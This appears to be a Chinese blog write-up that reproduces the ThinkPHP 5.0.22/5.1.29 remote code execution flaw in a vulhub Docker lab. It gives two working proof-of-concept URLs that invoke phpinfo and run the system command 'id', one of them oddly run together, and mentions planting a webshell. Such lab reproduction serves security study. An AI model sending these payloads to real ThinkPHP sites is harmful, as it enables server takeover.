Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

Thinkphp RCE

0x00 漏洞原理

ThinkPHP是国内使用极为广泛的PHP开发框架。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
 
 

0x01 影响版本

Thinkphp =5.0.22 / 5.1.29

 
 

0x02 环境搭建
cd vulhub-master/thinkphp/5-rce   #进入vulhub靶场
docker-compose up -d    

请添加图片描述
 
 

0x03 漏洞复现
 访问http://your-ip:8080,可以看到ThinkPHP的默认页面 

请添加图片描述
 
 
POC1

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1    
访问该POC1可以看到执行了phpinfo

请添加图片描述

 
 
POC2

 http://192.168.68.168:8080//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
访问POC2可以看到执行了id

请添加图片描述
 
 

用工具探测,成功探测到该漏洞

请添加图片描述
 
 

写入一句话木马

请添加图片描述
 
 

请添加图片描述
 
 

成功连上执行命令

请添加图片描述
 
 
 
 
 
参考链接
https://vulhub.org/#/environments/thinkphp/5-rce/
https://www.freebuf.com/articles/web/274062.html

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值